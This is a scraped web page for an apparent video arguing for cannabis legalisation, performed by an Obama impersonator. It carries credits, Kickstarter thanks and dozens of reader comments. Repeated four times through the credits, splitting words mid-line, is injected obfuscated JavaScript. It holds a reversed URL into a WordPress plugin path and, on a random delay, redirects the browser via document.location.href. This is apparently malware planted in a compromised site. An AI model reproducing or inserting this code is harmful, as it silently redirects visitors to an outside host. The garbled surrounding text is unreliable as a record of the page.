For more Information go toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Drug Policy Alliance

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// @PrinceEa

Reggie Brown as Obama

www.ReggieBrownObamaImpersonatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor.com

Special Thanks toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the Draw Shop for the illustrations
and Sabine Allaeys ( for creative contributions

Special Thanks toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to everyone who supported our Kickstarter. We truly couldn’t have done it without you. Danny Stamp, ravi_gangwani, Ryan Borchert, Tara Hogan, Tom Martini, Ericka Henderson, Robert Morrissey, thcmavn, jordanbecker24, Patrick Almond, Henry Szumski, Jannine Kenyon, Claude Galipeau, brendan26, tander42, Mike Brawley, Carey Ott, Peter Angelini , john_kiedaisch, Dominic Corva, nikki scoble, MC West, Amanda Marable, Teresa Haddock, eric_day, jrgatlin, B DAVID LONGHURST, jillianne castillo, Edwin H Engelmann, Joey Farnsworth, Andrew Curry, filippo loddo, vandewoestynecole, Anthony Savona, Brandon David, aaron pitts, reynoldi, alexanderjpeeler, Hunter Alving.

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45 thoughts on “WHY WEED SHOULD BE LEGAL ft Barack Obama”

  1. Manpreet Singh says:

    You want to grow a plant? You'll need a seed, it should be legal
    So that we could smoke WEED!


  2. callum torrance says:

    I disagree, smoking and drug use should all be banned(including alchohol, yes it is a drug). Other wise weed should be legal, just not the hulucagenic or harmful components, just the medically approved sections.

  3. W Brown says:

    Thank you for this video

  4. Matthew Carroll says:

    Weed is legal where I live

  5. J's Lawncare Services says:

    Prince ea should run for president

  6. Mini Playz says:

    Guys it's not the real Obama! It's says in the descrpition that someone is acting as him!

  7. Fren says:

    Brendon urie smokes weed

  8. FleeToClutch says:

    Show this to the nfl 4 David Irving

  9. Helaman Seavey says:

    In 2020 please run for president

  10. Levi Ackerman says:

    Cigarettes should be illegal not weed

  11. Levi Ackerman says:

    You should be President

  12. Travis Gueory says:

    Damn it's just weed

  13. Brendon Hayes says:

    Honestly I kinda don't want weed to be legal bc big companies would make it like cigarettes and pump a bunch of chemicals in it so they can grow more faster

  14. Juan Castillo says:

    Great value Obama.

  15. Matilda Romero says:

    Idk y but I just smoked a blut and this came up

  16. Ghost Warrior says:

    Drugs arent something that we will need…look arround you if we release these drugs people will leave everything to get this and look at afghanistan look what it does to the country, over 3 million people are using these drugs thats about 10% of the country's population if its in the world just immagine what would happen.. leaving there families homes and even accidently killing thier own family and children they spend and sell what ever they have to get those drugs…
    Now tell me do u want a society on drugs and people day dreaming or a society working on thier future enjoying real life
    Drugs HAS NO FUTURE!

  17. BFP_CornD says:

    Soooo that wasn’t Obama

  18. ItsJustNaf says:

    I won't smoke weed or any other intoxicant cause that's just my religion but this guy had a good point.

  19. ralsei with a gun says:

    I get high off suffering mine and others so it doesn't really bother me in the least

  20. Wackymiller says:

    Prince ea, GO FOR PRESIDENT, if you want anything to change you will have to do it yourself, cuz. Trump ain’t doin nothing

  21. grandma oil says:

    I dont remember obama looking like that

  22. DedMemes says:

    I hate this guy.

  23. Let's talk about our planet says:

    My uncle smoked weed and now everyone hate him, me too,. He still lives with his mother and makes her cry every thay. So thont say weed is good and shood be legal!

  24. toni torres says:

    So true lol I don’t do it cuz there no need to but some ppl really do need but on the other hand kids at my school just do it cuz they think it’s cool

  25. Jun Mon says:

    Smoke marijuana and get so high like birds in the sky we ✈

  26. derricklongjr58 says:

    Bruh I watched a few of your videos even though you not a stoner I fuck wit you. I'm a veteran I was discharged for cannabis. I didn't know at the time I was already suffering from PTSD. It is my dream to help others and open a dispensary and some of your motivational speeches inspire me to do something better not just for me and my family but for as many people who have to struggle from mental and health problems. Thank you my dude!!!

  27. Toby Cepin says:

    No one is gonna die from smokin a fattie

  28. Toby Cepin says:

    Weed is only a gateway drug to people stupid enough to beileve heroine crack cocaine and most of the other really fucked up drugs are good.

  29. Toby Cepin says:

    And weed isn't a drug

  30. Stan Evans says:

    However much more people smoke and drink than have take maromana so more people will die from smoking and drinking

  31. louis Lederer says:

    "A patient cured is a customer lost" shiit

  32. Unpopular Truths says:

    I may not be a liberal, but with such evidence, I must say there is no reason why cannabis should be illegal.

  33. B E A S T neb says:


  34. Eleanya Agbai-Eleanya says:

    Wait what about ppl with asthma

  35. Luigi Ferretti says:

    I respect you and like your video and contents, but repesectfully I ask you to go see DrugsFreeWorld.com Truth About Marijuana.

  36. Enis Shimaj says:

    dud i wish he was the president off the world

  37. Venicouse says:

    well this ain't the real Obama so

  38. Christopher Arthey says:

    I agree with a lot of these statements, but please come on, some of your arguments are just dumb. Like "Pot has actually driven American history". So has slavery. Also, cannabis is legally prescribed by MANY doctors to those who need it to recover.

  39. FUNFrenchy says:

    Lol imma go get some pot

  40. FUNFrenchy says:

    Words words words, BREATH words words words, BREATH HEAVY !

  41. Versitle says:

    This makes no sense

  42. Hot Shots says:

    That's one of the only videos I don't really agree with.

  43. Juan Galan says:

    Nice beat

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